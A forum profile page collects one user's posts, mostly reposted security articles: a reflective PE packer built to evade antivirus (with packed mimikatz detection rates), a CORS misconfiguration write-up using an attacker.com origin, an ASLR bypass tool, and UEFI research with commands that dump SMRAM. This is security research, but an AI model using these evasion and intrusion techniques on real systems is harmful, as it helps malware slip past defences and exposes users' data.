-
Posts
18725 -
Joined
-
Last visited
-
Days Won
707
Everything posted by Nytro
-
Din punct de vedere "security", as merge pe iPhone. Insa e cam limitat cand vine vorba de functionalitati. Toate telefoanele enumerate stau bine la capitolul "Camera": https://www.dxomark.com/category/mobile-reviews/ Iar despre procesor, RAM etc., suntem in perioada in care un telefon bun nu ar trebui sa aiba astfel de probleme.
-
Ce telefon v-ati dori? Am facut un poll, sunt curios ca ce pareri sunt pe aici.
-
Azi e ultima zi in care puteti lua bilet la pret mai mic.
-
[RST] NetRipper - Smart traffic sniffing for penetration testers
Nytro replied to Nytro's topic in Proiecte RST
Da, acolo l-am prezentat, mersi. Momentan, din cand in cand mai lucrez la el. Daca aveti sugestii, sau daca are probleme, puteti posta aici si ma ocup cand am timp de ele. -
La pagina de Speakers: .ts-speaker-image img { height: 200px; width: auto; margin-left: auto; margin-right: auto; } Lipsesc acele "margin-*". @Andrei , pentru cei cu OCD.
-
[RST] NetRipper - Smart traffic sniffing for penetration testers
Nytro replied to Nytro's topic in Proiecte RST
Am adaugat suport pentru Chrome 62. -
Stupid. Toate firmele de AV (de exemplu) pot sa isi instaleze un Root CA si gata.
-
Unde ai gasit acea legatura cu codette? PS: De la 1 noiembrie cresc preturile, sugestia mea ar fi sa luati bilete mai devreme: https://def.camp/tickets/
-
ASLRay Linux ELF x32 and x64 ASLR bypass exploit with stack-spraying Properties: ASLR bypass Cross-platform Minimalistic Simplicity Unpatchable Dependencies: Linux 2.6.12+ - would work on any x86-64 Linux-based OS BASH - the whole script Limitations: Stack needs to be executable (-z execstack) Binary has to be exploited through arguments locally (not file, socket or input) No support for other architectures and OSes (TODO) Need to know the buffer limit/size Sursa: https://github.com/cryptolok/ASLRay#aslray
-
- 2
-
-
-
Introducing New Packing Method: First Reflective PE Packer Amber October 24, 2017 Ege Balci Operating System, Research, Tools Because of the increasing security standards inside operating systems and rapid improvements on malware detection technologies todayâs malware authors takes advantage of the transparency offered by in-memory execution methods. In-memory execution or fileless execution of a PE file can be defined as executing a compiled PE file inside the memory with manually performing the operations that OS loader supposed to do when executing the PE file normally. In-memory execution of a malware facilitates the obfuscation and anti-emulation techniques. Additionally the malware that is using such methods leaves less footprints on the system since it does not have to possess a file inside the hard drive. Combining in-memory execution methods and multi stage infection models allows malware to infect systems with very small sized loader programs; only purpose of a loader is loading and executing the actual malware code via connecting to a remote system. Using small loader codes are hard to detect by security products because of the purpose and the code fragments of loaders are very common among legitimate applications. Malware that are using this approach can still be detected with scanning the memory and inspecting the behaviors of processes but in terms of security products these operation are harder to implement and costly because of the higher resource usage (Ramilli, 2010[1]). Current rising trend on malware detection technologies is to use the machine learning mechanisms to automate the detection of malwares with feeding very big datasets into the system, as in all machine learning applications this mechanism gets smarter and more accurate in time with absorbing more samples of malware. These mechanisms can feed large numbers of systems that human malware analysts canât scale. Malware Detection Using Machine Learning[2]paper by GavriluĹŁ DragoĹ from BitDefender Romania Labs widely explains the inner workings of machine learning usage on malware detection. According to the Automatic Analysis of Malware Behavior using Machine Learning[3] paper by Konrad Rieck, with enough data and time false positive results will get close to zero percent and deterministic detection of malware will be significantly effective on new and novel malware samples. The main purpose of this work is developing a new packing methodology for PE files that can alter the way of delivering the malware to the systems. Instead of trying to find new anti-detection techniques that feed the machine learning data-sets, delivering the payload to the systems via fileless code injections directly bypasses most of the security mechanisms. With this new packing method it is possible to convert compiled PE files into multi stage infection payloads that can be used with common software vulnerabilities such as buffer overflows. Known Methods Following techniques are inspiration point of our new packing method. Reflective DLL Injection[4] is a great library injection technique developed by Stephen Fewer and it is the main inspiration point for developing this new packer named as Amber. This technique allows in-memory execution of a specially crafted DLL that is written with reflective programming approach. Because of the adopted reflective programming approach this technique allows multi stage payload deployment. Besides the many advantages of this technique it has few limitations. First limitation is the required file format, this technique expects the malware to be developed or recompiled as a DLL file, and unfortunately in most cases converting an already compiled EXE file to DLL is not possible or requires extensive work on the binary. Second limitation is the need for relocation data. Reflective DLL injection technique requires the relocation data for adjusting the base address of the DLL inside the memory. Also this method has been around for a long time, this means up to date security products can easily detect the usage of Reflective DLL injection. Our new tool, Amber will provide solutions for each of these limitations. Process Hollowing[5] is another commonly known in-memory malware execution method that is using the documented Windows API functions for creating a new process and mapping an EXE file inside it. This method is popular among crypters and packers that are designed to decrease the detection rate of malwares. But this method also has several drawbacks. Because of the Address Space Layout Randomization (ASLR) security measure inside the up-to-date Windows operating systems, the address of memory region when creating a new process is randomized, because of this process hollowing also needs to implement image base relocation on up-to-date Windows systems. As mentioned earlier, base relocation requires relocation data inside PE files. Another drawback is because of the usage of specific file mapping and process creation API functions in specific order this method is easy to identify by security products. Hyperion[6] is a crypter for PE files, developed and presented by Christian Amman in 2012. It explains the theoretic aspects of runtime crypters and how to implement it. The PE parsing approach in assembly and the design perspective used while developing Hyperion helped us for our POC packer. Technical Details of our new packing method: Amber The fundamental principle of executing a compiled binary inside the OS memory is possible with imitating the PE loader of the OS. On Windows, PE loader does many important things, between them mapping a file to memory and resolving the addresses of imported functions are the most important stages for executing a EXE file. Current methods for executing EXE files in memory uses specific windows API functions for mimicking the windows PE loader. Common approach is to create a new suspended process with calling CreateProcess windows API function and mapping the entire EXE image inside it with the help of NtMapViewOfSection, MapViewOfFileand CreateFileMapping functions. Usage of such functions indicates suspicious behavior and increases the detection possibility of the malware. One of the key aspects while developing our packer is using less API functions as possible. In order to avoid the usage of suspicious file mapping API functions our packer uses premapped PE images moreover execution of the malware occurs inside of the target process itself without using the CreateProcess windows API function. The malware executed inside the target process is run with the same process privileges because of the shared _TEB block which is containing the privilege information and configuration of a process. Amber has 2 types of stub, one of them is designed for EXE files that are supporting the ASLR and the other one is for EXE files that are stripped or doesnât have any relocation data inside. The ASLR supported stub uses total of 4 windows API calls and other stub only uses 3 that are very commonly used by majority of legitimate applications. ASLR Supported Stub: VirtualAlloc CreateThread LoadLibraryA GetProcAddress Non-ASLR Stub: VirtualProtect LoadLibraryA GetProcAddress In order to call these APIâs on runtime Amber uses a publicly known EAT parsing technique that is used by Stephen Fewerâs Reflective DLL injection[4] method. This technique simply locates the InMemoryOrderModuleList structure with navigating through Process Environment Block (PEB) inside memory. After locating the structure it is possible to reach export tables of all loaded DLLs with reading each _LDR_DATA_TABLE_ENTRY structure pointed by the InMemoryOrderModuleList. After reaching the export table of a loaded DLL it compares the previously calculated ROR (rotate right) 13 hash of each exported function name until a match occurs. Amberâs packing method also provides several alternative windows API usage methods, one of them is using fixed API addresses, this is the best option if the user is familiar on the remote process that will host the Amber payload. Using fixed API addresses will directly bypass the latest OS level exploit mitigations that are inspecting export address table calls also removing API address finding code will reduce the overall payload size. Another alternative techniques can be used for locating the addresses of required functions such as IAT parsing technique used by Josh Pitts in âTeaching Old Shellcode New Tricksâ[7] presentation. Current version of Amber packer versions only supports Fixed API addresses and EAT parsing techniques but IAT parsing will be added on next versions. Generating the Payload For generating the actual Amber payload first packer creates a memory mapping image of the malware, generated memory mapping file contains all sections, optional PE header and null byte padding for unallocated memory space between sections. After obtaining the mapping of the malware, packer checks the ASLR compatibility of the supplied EXE, if the EXE is ASLR compatible packer adds the related Amber stub if not it uses the stub for EXE files that has fixed image base. From this point Amber payload is completed. Below image describes the Amber payload inside the target process, ASLR Stub Execution Execution of ASLR supported stub consists of 5 phases, Base Allocation Resolving API Functions Base Relocation Placement Of File Mapping Execution At the base allocation phase stub allocates a read/write/execute privileged memory space at the size of mapped image of malware with calling the VirtualAlloc windows API function, This memory space will be the new base of malware after the relocation process. In the second phase Amber stub will resolve the addresses of functions that is imported by the malware and write the addresses to the import address table of the mapped image of malware. Address resolution phase is very similar to the approach used by the PE loader of Windows, Amber stub will parse the import table entries of the mapped malware image and load each DLL used by the malware with calling the LoadLibraryA windows API function, each _IMAGE_IMPORT_DESCRIPTOR entry inside import table contains pointer to the names of loaded DLLâs as string, stub will take advantage of existing strings and pass them as parameters to the LoadLibraryA function, after loading the required DLL Amber stub saves the DLL handle and starts finding the addresses of imported functions from the loaded DLL with the help of GetProcAddress windows API function, _IMAGE_IMPORT_DESCRIPTOR structure also contains a pointer to a structure called import names table, this structure contains the names of the imported functions in the same order with import address table(IAT), before calling the GetProcAddress function Amber stub passes the saved handle of the previously loaded DLL and the name of the imported function from import name table structure. Each returned function address is written to the malwares import address table (IAT) with 4 padding byte between them. This process continuous until the end of the import table, after loading all required DLLâs and resolving all the imported function addresses second phase is complete. At the third phase Amber stub will start the relocation process with adjusting the addresses according to the address returned by the VirtualAlloc call, this is almost the same approach used by the PE loader of the windows itself, stub first calculates the delta value with the address returned by the VirtualAlloc call and the preferred base address of the malware, delta value is added to the every entry inside the relocation table. In fourth phase Amber stub will place the file mapping to the previously allocated space, moving the mapped image is done with a simple assembly loop that does byte by byte move operation. At the final phase Amber stub will create a new thread starting from the entry point of the malware with calling the CreateThread API function. The reason of creating a new thread is to create a new growable stack for the malware and additionally executing the malware inside a new thread will allow the target process to continue from its previous state. After creating the malware thread stub will restore the execution with returning to the first caller or stub will jump inside a infinite loop that will stall the current thread while the malware thread successfully runs. Non-ASLR Stub Execution Execution of Non-ASLR supported stub consists of 4 phases, Base Allocation Resolving API functions Placement Of File Mapping Execution If the malware is stripped or has no relocation data inside there is no other way than placing it to its preferred base address. In such condition stub tries to change the memory access privileges of the target process with calling VirtualProtect windows API function starting from image base of the malware through the size of the mapped image. If this condition occurs preferred base address and target process sections may overlap and target process will not be able to continue after the execution of Amber payload. Fixed Amber stub may not be able to change the access privileges of the specified memory region, this may have multiple reasons such as specified memory range is not inside the current process page boundaries (reason is most probably ASLR) or the specified address is overlapping with the stack guard regions inside memory. This is the main limitation for Amber payloads, if the supplied malware donât have ASLR support (has no relocation data inside) and stub canât change the memory access privileges of the target process payload execution is not possible. In some situations stub successfully changes the memory region privileges but process crashes immediately, this is caused by the multiple threads running inside the overwritten sections. If the target process owns multiple threads at the time of fixed stub execution it may crash because of the changing memory privileges or overwriting to a running section. However these limitations doesnât matter if itâs not using the multi stage infection payload with fixed stub, current POC packer can adjust the image base of generated EXE file and the location of Amber payload accordingly. If the allocation attempt ends up successful first phase is complete. Second phase is identical with the approach used by the ASLR supported stub. After finishing the resolution of the API addresses, same assembly loop used for placing the completed file mapping to the previously amended memory region. At the final phase stub jumps to the entry point of the malware and starts the execution without creating a new thread. Unfortunately, usage of Non-ASLR Amber stub does not allow the target process to continue with its previous state. Multi Stage Applications Security measures that will be taken by operating systems in the near future will shrink the attack surface even more for malwares. Microsoft has announced Windows 10 S on May 2 2017[8], this operating system is basically a configured version of Windows 10 for more security, one of the main precautions taken by this new operating system is doesnât allow to install applications other than those from Windows Store. This kind of white listing approach adopted by the operating systems will have a huge impact on malwares that is infecting systems via executable files. In such scenario usage of multi stage in-memory execution payloads becomes one of the most effective attack vectors. Because of the position independent nature of the Amber stubs it allows multi stage attack models, current POC packer is able to generate a stage payload from a complex compiled PE file that can be loaded and executed directly from memory like a regular shellcode injection attack. In such overly restrictive systems multi stage compatibility of Amber allows exploitation of common memory based software vulnerabilities such as stack and heap based buffer overflows. However due to the limitations of the fixed Amber stub it is suggested to use ASLR supported EXE files while performing multi stage infection attacks. Stage payloads generated by the POC packer are compatible with the small loader shellcodes and payloads generated from Metasploit Framework [9], this also means Amber payloads can be used with all the exploits inside the Metasploit Framework [9] that is using the multi stage meterpreter shellcodes. Here is the source code of Amber . Feel free to fork and contribute..! https://github.com/EgeBalci/Amber Demo 1 â Deploying EXE files through metasploit stagers This video demonstrates how to deploy regular EXE files into systems with using the stager payloads of metasploit. The Stage.exe file generated from Metasploit fetches the amberâs stage payload and executes inside the memory. Demo 2 â Deploying fileless ransomware with Amber ( 3 different AV ) This video is a great example of a possible ransomware attack vector. With using amber, a ransomware EXE file packed and deployed to a remote system via fileless powershell payload. This attack can also be replicated with using any kind of buffer overflow vulnerability. Detection Rate Current detection rate (19.10.2017) of the POC packer is pretty satisfying but since this is going to be a public project current detection score will rise inevitably When no extra parameters passed (only the file name) packer generates a multi stage payload and performs an basic XOR cipher with a multi byte random key then compiles it into a EXE file with adding few extra anti detection functions. Generated EXE file executes the stage payload like a regular shellcode after deciphering the payload and making the required environmental checks. This particular sample is the mimikatz.exe (sha256 â 9369b34df04a2795de083401dda4201a2da2784d1384a6ada2d773b3a81f8dad) file packed with a 12 byte XOR key (./amber mimikatz.exe -ks 12). The detection rate of the mimikatz.exe file before packing is 51/66 on VirusTotal. In this particular example packer uses the default way to find the windows API addresses witch is using the hash API, avoiding the usage of hash API will decrease the detection rate. Currently packer supports the usage of fixed addresses of IAT offsets also next versions will include IAT parser shellcodes for more alternative API address finding methods. VirusTotal https://www.virustotal.com/#/file/3330d02404c56c1793f19f5d18fd5865cadfc4bd015af2e38ed0671f5e737d8a/detection VirusCheckmate Result http://viruscheckmate.com/id/1ikb99sNVrOM NoDistribute https://nodistribute.com/result/image/7uMa96SNOY13rtmTpW5ckBqzAv.png Future Work This work introduces a new generation malware packing methodology for PE files but does not support .NET executables, future work may include the support for 64 bit PE files and .NET executables. Also in terms of stealthiness of this method there can be more advancement. Allocation of memory regions for entire mapped image done with read/write/execute privileges, after placing the mapped image changing the memory region privileges according to the mapped image sections may decrease the detection rate. Also wiping the PE header after the address resolution phase can make detection harder for memory scanners. The developments of Amber POC packer will continue as a open source project. References [1] Ramilli, Marco, and Matt Bishop. âMulti-stage delivery of malware.â Malicious and Unwanted Software (MALWARE), 2010 5th International Conference on. IEEE, 2010. [2] GavriluĹŁ, DragoĹ, et al. âMalware detection using machine learning.â Computer Science and Information Technology, 2009. IMCSITâ09. International Multiconference on. IEEE, 2009. [3] Rieck, Konrad, et al. âAutomatic analysis of malware behavior using machine learning.â Journal of Computer Security 19.4 (2011): 639-668. [4] Fewer, Stephen. âReflective DLL injection.â Harmony Security, Version 1 (2008). [5] Leitch, John. âProcess hollowing.â (2013). [6] Ammann, Christian. âHyperion: Implementation of a PE-Crypter.â (2012). [7] Pitts, Josh. âTeaching Old Shellcode New Tricksâ https://recon.cx/2017/brussels/resources/slides/RECON-BRX-2017 Teaching_Old_Shellcode_New_Tricks.pdf (2017) [8] https://news.microsoft.com/europe/2017/05/02/microsoft-empowers-students-and-teachers-with-windows-10-s-affordable-pcs-new-surface-laptop-and-more/ [9] Rapid7 Inc, Metasploit Framework https://www.metasploit.com [10] Desimone, Joe. âHunting In Memoryâ https://www.endgame.com/blog/technical-blog/hunting-memory (2017) [11] Lyda, Robert, and James Hamrock. âUsing entropy analysis to find encrypted and packed malware.â IEEE Security & Privacy 5.2 (2007). [12] Nasi, Emeric. âPE Injection Explained Advanced memory code injection techniqueâ Creative Commons Attribution-NonCommercial-NoDerivs 3.0 License (2014) [13] Pietrek, Matt. âPeering Inside the PE: A Tour of the Win32 Portable Executable File Formatâ https://msdn.microsoft.com/en-us/library/ms809762.aspx (1994) Sursa: https://pentest.blog/introducing-new-packing-method-first-reflective-pe-packer/
-
- 6
-
-
-
Exploiting Misconfigured CORS October 25, 2017 Hi folks, This post is about some of the CORS misconfiguration which I see frequently, mostly in Django applications. Letâs assume all the test cases have been performed on the domain example.com Following are the most common CORS configurations ⢠Access-Control-Allow-Origin: * ⢠Remark: In this case we can fetch unauthenticated resources only. ⢠Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true ⢠Remark: In this case we can fetch unauthenticated resources only. ⢠Access-Control-Allow-Origin: null Access-Control-Allow-Credentials: true ⢠Remark: In this case we can fetch authenticated resources as well. ⢠Access-Control-Allow-Origin: https://attacker.com Access-Control-Allow-Credentials: true ⢠Remark: In this case we can fetch authenticated resources as well. ⢠Access-Control-Allow-Origin: https://example.com Access-Control-Allow-Credentials: true ⢠Remark: Properly implemented So we usually see these type of CORS configuration in response headers and most of us donât try to exploit it because we think itâs properly implemented. But thatâs not true. Letâs study some of the weird CORS misconfiguration cases. ⢠I have found this vulnerability in one of most popular python web hosting site which has following request and response headers shown below - Original Request and response headers GET /<redacted> HTTP/1.1 Host: dummy.example.com User-Agent: <redacted> Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: <redacted> Origin: https://www.example.com Connection: close HTTP/1.1 200 OK Server: <redacted> Date: <redacted> Content-Type: application/json; charset=UTF-8 Content-Length: 87 Connection: close Cache-Control: no-store, no-cache, must-revalidate, max-age=0 Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://www.example.com Strict-Transport-Security: max-age=31536000; So looking at the response headers, you can see CORS is implemented correctly and most of us donât test it further. At this point most of time I have seen that by changing the value of origin header would reflect back in response headers as following. Edited Request and response headers GET /<redacted>HTTP/1.1 Host: dummy.example.com User-Agent: <redacted> Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: <redacted> Origin: https://attacker.com Connection: close HTTP/1.1 200 OK Server: <redacted> Date: <redacted> Content-Type: application/json; charset=UTF-8 Content-Length: 87 Connection: close Cache-Control: no-store, no-cache, must-revalidate, max-age=0 Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://attacker.com Strict-Transport-Security: max-age=31536000; ⢠I have found this vulnerability in one of the bitcoin website which has the following request and response headers. Original Request and response headers POST /<redacted> HTTP/1.1 Host: <redacted> User-Agent: <redacted> Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded;charset=utf-8 Referer: <redacted> Content-Length: 270 Cookie: <redacted> Connection: close HTTP/1.1 200 OK Server: nginx Date: <redacted> Content-Type: application/json Connection: close Access-Control-Allow-Credentials: true Content-Length: 128 Looking at the response you can see Access-Control-Allow-Origin header is missing so I added origin header in http request which makes it vulnerable as following. Edited Request and response headers POST /<redacted>HTTP/1.1 Host: <redacted> User-Agent: <redacted> Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded;charset=utf-8 Origin: https://attacker.com Referer: <redacted> Content-Length: 270 Cookie: <redacted> Connection: close HTTP/1.1 200 OK Server: nginx Date: <redacted> Content-Type: application/json Connection: close Access-Control-Allow-Origin: https://attacker.com Access-Control-Allow-Credentials: true Content-Length: 128 Thanks for reading Sursa: http://c0d3g33k.blogspot.de/2017/10/exploiting-misconfigured-cors.html?m=1
-
- 3
-
-
-
24 October, 2017 UEFI BIOS holes. So Much Magic. Donât Come Inside. Category: Research Tags: firmware security vulnerabilities Download whitepaper (PDF 855.67 KB)Download presentation (PDF 15.65 MB) Introduction In recent years, embedded software security has become a red-hot topic, attracting the attention of high profile security researchers from all around the globe. However, the quality of code is still far from perfect as long as its security is considered. For instance, the CVE-2017-5721 SMM Privilege Elevation vulnerability in the firmware could affect such scope of vendors like Acer, ASRock, ASUS, Dell, HP, GIGABYTE, Lenovo, MSI, Intel, and Fujitsu. This white paper is intended to describe how to detect a vulnerability in a motherboard firmware with the help of the following tools: Intel DAL UEFITool CHIPSEC RWEverything and how to bypass the patch that fixes this vulnerability. For those readers who need some background information, here is the list of helpful additional materials: Advanced x86: Introduction to BIOS & SMM (John Butterworth) Training: Security of BIOS/UEFI System Firmware from Attacker and Defender Perspectives (Advanced Threat Research, McAfee/Intel) Attacking and Defending BIOS in 2015 (Advanced Threat Research, McAfee/Intel) UEFI Firmware Rootkits: Myths and Reality (Alex Matrosov and Eugene Rodionov) Essential information on the CVE-2017-5721 SMM Privilege Elevation vulnerability can be found by the following link: https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00084&languageid=en-fr Preliminary stage of the research Making a showcase stand To make a showcase, we used the GA-Q170M-D3H motherboard with Intel Q170 Express chipset. The motherboard turned out to be a perfect choice for the research, due to the following reasons: Firmware updates are available as a binary image. Therefore, there is no need for users to burden themselves with extracting firmware parts from .exe files, in contrast with some other vendorsâ devices. Note: In the scope of the research, we used the latest available firmware version - F22. The firmware is based on AMI BIOS Aptio V widely used by motherboard and laptop manufacturers. It is possible to enable the Intel Direct Connect Interface. The most obvious question that may come to a readerâs mind here is: ââWhat is the Intel Direct Connect Interface?â In a nutshell, the Intel Direct Connect Interface (the DCI) is a technology that allows low-level processor debugging without putting much effort in the process. The only thing needed to debug a target system is the Intel Skylake processor (6th gen. or higher) and USB 3.0 Debugging Cable, and, of course, USB 3.0 ports in both host and target systems. To operate with the interface one can use the Intel DFx Abstraction Layer (DAL) application available as a part of the Intel System Studio trial version. For more details, see âIntel DCI Secretsâ. It is also necessary to install a CPU on the motherboard. The motherboard used in the scope of the research was equipped with Intel Core i3-6320. Of course, the DRAM is also needed to be installed. The assembled showcase stand looked this way (see Fig. 1). Fig. 1. Showcase stand As you can see on the picture, we have unsoldered the SPI flash memory (which stores the motherboardâs firmware) and put it into SOIC8 adapter. Hence, if we occasionally âbrickâ the system we would be able to recover the original firmware image using the hardware programmer. Enabling Intel DCI on a target system There are two ways to turn on DCI: the first one is simple, the other is difficult, which is quite obvious. Enabling Intel DCI. The easy way If your system is based on System on Chip (SoC), you must be able to enable DCI using the BIOS Setup (see Fig. 2). Fig. 2. Enabling DCI in BIOS Setup Another option is to use the INTEL-SA-00073 vulnerability that some motherboards have. This vulnerability allows enabling the DCI right from a target platform by writing just one byte to memory. It turned out that GA-Q170M-D3H has no option to enable the DCI in BIOS Setup. In such a case it is worth using PCH Private Configuration Space while the system is running (see Fig. 3). DCI Control Register (ECTRL) â Offset 4h Fig. 3. Enabling DCI with PCH Private Configuration Space According to the documentation, the DCI activation is conducted by toggling the fourth bit of the ECTRL register. The bit is located in memory at SBREG_BAR + (0xB8 << 0x10) + 4. The showcase had installed Windows 10 Enterprise, that is why the RW-Everything tool was used. Unfortunately, it was not possible to enable the DCI with the help of the fourth bit, while the eighth one is set to value 1. By practical consideration, it was found out that the eighth bit stands for âLockedâ, which hinders the DCI during the system operation. Nonetheless, if a system register is empty, there are all chances to enable the debugging interface without any difficulties (see Fig. 4). Fig. 4. RW-Everything tool Enabling DCI. The difficult way The DCI can be enabled by changing default settings of BIOS or PCH Straps (held inside the firmware image) with Intel Flash Image Tool. After that, it is necessary to rebuild the image and flash it to the SPI flash memory. Here, one needs to use a hardware programmer to upload a modified firmware. It is possible to make the required changes by using the AMIBCP utility that can be downloaded from the Internet. The utility gives an opportunity to change default values of different settings hidden from a user in BIOS setup. To do this open the âQ170MD3H.F22â file in the AMIBCP utility and find Control Group Structures with the names âDebug Interfaceâ and âDirect Connect Interfaceâ (see Fig. 5). Fig. 5. AMIBCP utility The process of activating the settings comes down to changing âFailsafeâ and âOptimalâ to the âEnabledâ values. Then save a new firmware image. This way a modified firmware would be ready. The only thing left is to upload this new firmware to the SPI flash memory in whichever convenient way. Thus, it will be possible to initiate debugging. If the interface is successfully activated and the target system is started, a new device âIntel USB Native Debug Class Devicesâ will appear in the host system (see Fig. 6). Fig. 6. A new device appeared in the host system Main stage of the research Setting Intel DFx Abstraction Layer The default Intel DAL installation catalog is âC:\Intel\DALâ. It contains the âConfigConsole.exeâ utility. In âConfigConsole.exeâ it is necessary to specify a corresponding Topology Config, which is âSKL_SPT_OpenDCI_Dbc_Only_ReferenceSettingsâ, because the target platform consists of Skylake (SKL) and 100-series chipset (Sunrise Point, SPT). While the debugging interface consists of USB 3.0 debugging cable only, it is required to set the Intel DAL so that it works with nothing but JTAG pins. Otherwise, it will be merely impossible to halt a processor. The Intel DAL supports startup scripts, which will be executed if the âdalstartup.pyâ file is created in the application catalog. The script will be executed when the debugging console is started. import itpii itp = itpii.baseaccess() # When running using JTAG Only Mode enabled, the PREQ, PRDY, DBR and RESET # pins are considered off, and PowerGood is considered on. We also enable # TAP based break detection, and and start to poll for probe mode entry. # Triggered scans are disabled and memory scan delays are put into place. itp.jtagonlymode(0, True) After all the required actions have been performed, it is worth trying to start âPythonConsole.cmdâ (you see it right: the console is designed as a python shell) and to halt the processor cores after the initialization, just to make sure it is operable. Registering MasterFrame... Registered C:\Intel\DAL\MasterFrame.HostApplication.exe Successfully. Using Intel DAL 1.9.9114.100 Built 3/29/2017 against rev ID 482226 [1714] Using Python 2.7.12 (64bit), .NET 2.0.50727.8669, Python.NET 2.0.18, pyreadline 2.0.1 DCI: Target connection has been established DCI: Transport has been detected Target Configuration: SKL_SPT_OpenDCI_Dbc_Only_ReferenceSettings Note: Target reset has occurred Note: Power Restore occurred Note: The âcoregroupsactiveâ control variable has been set to âGPCâ Using SKL_SPT_OpenDCI_Dbc_Only_ReferenceSettings Successfully imported âC:\Intel\DAL\dalstartupâ >>? itp.halt() [SKL_C0_T0] MWAIT C1 B break at 0x10:FFFFF80913FE1348 in task 0x0040 [SKL_C0_T1] MWAIT C1 B break at 0x10:FFFFF80913FE1348 in task 0x0040 [SKL_C1_T0] MWAIT C1 B break at 0x10:FFFFF80913FE1348 in task 0x0040 [SKL_C1_T1] MWAIT C1 B break at 0x10:FFFFF80913FE1348 in task 0x0040 >>> For more information about commands read the Intel guide that can be found by the following path: C:\Intel\DAL\Docs\PythonCLIUsersGuide.pdf Getting System Management RAM dump The SMRAM memory dump can provide plenty of information useful for vulnerability detection in UEFI BIOS because most UEFI structures have unique signatures, which enables memory forensic. However, having high privileges, the SMRAM memory range is protected from being accessed from an OS. Nonetheless, it is no difficulty at all if one can manipulate with processorâs level debugger. To start SMRAM dumping, we need to know where it is located. Here, CHIPSEC framework may come in handy. The framework is the perfect choice for operating with hardware due to its rich functionality. As it can be seen, the code below can be used to easily get the SMRAM address range: In [5]: import chipsec.chipset In [6]: cs = chipsec.chipset.cs() ...: cs.init(None, True, True) ...: WARNING: ******************************************************************* WARNING: Chipsec should only be used on test systems! WARNING: It should not be installed/deployed on production end-user systems. WARNING: See WARNING.txt WARNING: ******************************************************************* [CHIPSEC] API mode: using CHIPSEC kernel module API In [7]: SMRAM = cs.cpu.get_SMRAM() In [8]: hex(SMRAM[0]) Out[8]: â0xbd000000Lâ In [9]: hex(SMRAM[1]) Out[9]: â0xbd7fffffLâ To obtain access to SMRAM via the DCI, it is necessary to set up the breakpoint that would work while SMM is being entered, and then to simulate the Software System Management Interrupt call (SW SMI) by writing in port 0xb2. In debugging console, it looks the following way: >>? itp.halt() [SKL_C0_T0] MWAIT C1 B break at 0x10:FFFFF8055F1A1348 in task 0x0040 [SKL_C0_T1] MWAIT C1 B break at 0x10:FFFFF8055F1A1348 in task 0x0040 [SKL_C1_T0] MWAIT C1 B break at 0x10:FFFFF8055F1A1348 in task 0x0040 [SKL_C1_T1] MWAIT C1 B break at 0x10:FFFFF8055F1A1348 in task 0x0040 >>> itp.cv.smmentrybreak=1 >>> itp.threads[0].port(0xb2, 0) >>> itp.go() >>? [SKL_C0_T0] SMM Entry break at 0xC600:0000000000008000 in task 0x0040 [SKL_C0_T1] SMM Entry break at 0xC680:0000000000008000 in task 0x0040 [SKL_C1_T0] SMM Entry break at 0xC700:0000000000008000 in task 0x0040 [SKL_C1_T1] SMM Entry break at 0xC780:0000000000008000 in task 0x0040 >>? Now, with the processor entered in the SMM mode, it is possible to access the protected memory. >>> itp.threads[0].memsave(âsmram.binâ, â0xbd000000Pâ, â0xbd7fffffPâ, True) Due to the requested amount of memory (8388608 bytes), this command will take a while to execute. Due to the requested amount of memory (8388608 bytes), this command will take a while to execute. >>> So, getting full dump recorded in the â.binâ file is only a matter of seconds. We can use the smram_parse.py script to analyze the dump. The point of interest here is Software SMI handlers, which is the most widely used UEFI BIOS attack vector. The script helps to get all the necessary information related to the SW SMI handlers: SW SMI HANDLERS: 0xbd465c10: SMI = 0x28, addr = 0xbd463a3c, image = PowerMgmtSmm 0xbd59dc10: SMI = 0x56, addr = 0xbd59bb14, image = CpuSpSMI 0xbd59db10: SMI = 0x57, addr = 0xbd59bc88, image = CpuSpSMI 0xbd541d10: SMI = 0x62, addr = 0xbd574004, image = GenericComponentSmmEntry * 0xbd541b10: SMI = 0x65, addr = 0xbd575024, image = GenericComponentSmmEntry * 0xbd541a10: SMI = 0x63, addr = 0xbd5753a0, image = GenericComponentSmmEntry * 0xbd541910: SMI = 0x64, addr = 0xbd575a18, image = GenericComponentSmmEntry * 0xbd541810: SMI = 0xb2, addr = 0xbd575fa4, image = GenericComponentSmmEntry * 0xbd541110: SMI = 0xb0, addr = 0xbd537c28, image = NbSmi * 0xbd542910: SMI = 0xbb, addr = 0xbd52ed04, image = SbRunSmm 0xbd542210: SMI = 0xa0, addr = 0xbd525ce4, image = AcpiModeEnable 0xbd542010: SMI = 0xa1, addr = 0xbd525dd0, image = AcpiModeEnable 0xbd524b10: SMI = 0x55, addr = 0xbd5114d0, image = SmramSaveInfoHandlerSmm 0xbd4e6a10: SMI = 0x43, addr = 0xbd4e5360, image = AhciInt13Smm * 0xbd4e6810: SMI = 0x44, addr = 0xbd4e07bc, image = MicrocodeUpdate * 0xbd4e6610: SMI = 0x41, addr = 0xbd4dc9b8, image = OA3_SMM * 0xbd4e6510: SMI = 0xdf, addr = 0xbd4dab54, image = OA3_SMM 0xbd4e6410: SMI = 0xef, addr = 0xbd4d89e0, image = SmiVariable 0xbd4e6310: SMI = 0x90, addr = 0xbd4d42dc, image = BiosDataRecordSmi * 0xbd4cec10: SMI = 0x61, addr = 0xbd4cfde0, image = CmosSmm 0xbd4ce510: SMI = 0x42, addr = 0xbd4c4cd0, image = NvmeSmm 0xbd4ce110: SMI = 0x26, addr = 0xbd4ac32c, image = Ofbd * 0xbd497c10: SMI = 0x20, addr = 0xbd4929bc, image = SmiFlash * 0xbd497b10: SMI = 0x21, addr = 0xbd4929bc, image = SmiFlash * 0xbd497a10: SMI = 0x22, addr = 0xbd4929bc, image = SmiFlash * 0xbd497910: SMI = 0x23, addr = 0xbd4929bc, image = SmiFlash * 0xbd497810: SMI = 0x24, addr = 0xbd4929bc, image = SmiFlash * 0xbd497710: SMI = 0x25, addr = 